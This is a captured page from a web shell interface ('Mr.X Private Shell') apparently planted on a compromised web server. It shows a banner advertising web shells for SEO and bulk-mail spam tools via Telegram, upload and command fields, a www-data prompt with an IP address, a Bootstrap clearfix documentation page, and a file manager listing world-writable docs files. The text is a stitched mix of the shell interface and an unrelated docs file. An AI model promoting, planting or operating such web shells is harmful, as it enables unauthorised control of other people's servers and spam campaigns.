__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
---
layout: docs
title: Clearfix
description: Quickly and easily clear floated content within a container by adding a clearfix utility.
group: utilities
---

Easily clear `float`s by adding `.clearfix` **to the parent element**. Can also be used as a mixin.

```html
<div class="clearfix">...</div>
```

```scss
// Mixin itself
@mixin clearfix() {
  &::after {
    display: block;
    content: "";
    clear: both;
  }
}

// Usage as a mixin
.element {
  @include clearfix;
}
```

The following example shows how the clearfix can be used. Without the clearfix the wrapping div would not span around the buttons which would cause a broken layout.

{{< example >}}
<div class="bg-info clearfix">
  <button type="button" class="btn btn-secondary float-start">Example Button floated left</button>
  <button type="button" class="btn btn-secondary float-end">Example Button floated right</button>
</div>
{{< /example >}}

Filemanager

Name Type Size Permission Actions
_index.md File 78 B 0777
borders.md File 2.4 KB 0777
clearfix.md File 915 B 0777
close-icon.md File 365 B 0777
colors.md File 2.68 KB 0777
display.md File 3.88 KB 0777
embed.md File 1.87 KB 0777
flex.md File 22.48 KB 0777
float.md File 1.67 KB 0777
image-replacement.md File 968 B 0777
interactions.md File 814 B 0777
overflow.md File 1006 B 0777
position.md File 1.38 KB 0777
screen-readers.md File 596 B 0777
shadows.md File 740 B 0777
sizing.md File 2.13 KB 0777
spacing.md File 3.95 KB 0777
stretched-link.md File 4.34 KB 0777
text.md File 4.15 KB 0777
vertical-align.md File 1.25 KB 0777
visibility.md File 914 B 0777
Filemanager